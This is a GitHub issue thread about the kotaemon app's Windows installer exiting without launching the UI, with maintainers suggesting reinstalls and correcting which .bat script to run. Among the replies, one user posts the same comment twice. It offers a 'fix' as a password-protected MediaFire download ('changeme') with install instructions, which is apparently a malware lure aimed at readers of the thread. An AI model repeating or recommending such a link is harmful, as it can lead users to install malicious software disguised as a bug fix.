### ISSUE TITLE
[BUG] - <title>Can not start on windows

### ISSUE THREAD

**Issue by UniVersos1** [Cinnamon/kotaemon#161]
### Description

I follow the steps until i get here, press any key to continue and then fails

![Screenshot_24](https://github.com/user-attachments/assets/57067a20-ad3f-4942-9643-01919f8295df)

### Reproduction steps

```bash
1- installing using windows.bat
finish installing then i get that message
```

### Screenshots

```bash
![DESCRIPTION](LINK.png)
```

### OS

Windows

**Comment by phv2312** [comment]
![image](https://github.com/user-attachments/assets/f76d2717-6b4b-4083-8dad-c63928f0871a)
It seems to work normally on my window machine @UniVersos1 .
From the logs you provide I doubt that there are some failures happend silently while installing some python packages. 
Can you try to remove the conda environment and try again ? (The environment directory can be found on the log) or try on another machine ?

**Comment by taprosoft** [comment]
@UniVersos1 Can you run the .bat file again to see if it works? Some time it took second run to finish the install.

**Comment by UniVersos1** [comment]
> @UniVersos1 Can you run the .bat file again to see if it works? Some time it took second run to finish the install.

I tried that, also deleting all, even uninstalling miniconda and then trying to runwindows.bat again and this is what i get

Will exit now...
Deactivate conda environment at C:\Users\Administrator\Desktop\kotaemon-app\install_dir\env
Script completed successfully.
Press any key to continue . . .

and when i press any key it just closes the terminal


![conda](https://github.com/user-attachments/assets/60fa58bb-fa9d-4522-9115-518c237daa87)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by cin-albert** [comment]
Hi @UniVersos1,

For the first image, it seems like you ran `update_windows.bat` instead of `run_windows.bat` to install. This is why it exited after finishing the script and didn't launch the UI.

For the second image, it is difficult for us to debug as we can't see the full logs. Did you encounter any errors during the installation? For example, did nltk fail to download some packages?

Additionally, could you share the above log before the error occurred? Just rerun the `run_windows.bat` to see the error, since you've already completed the installation.
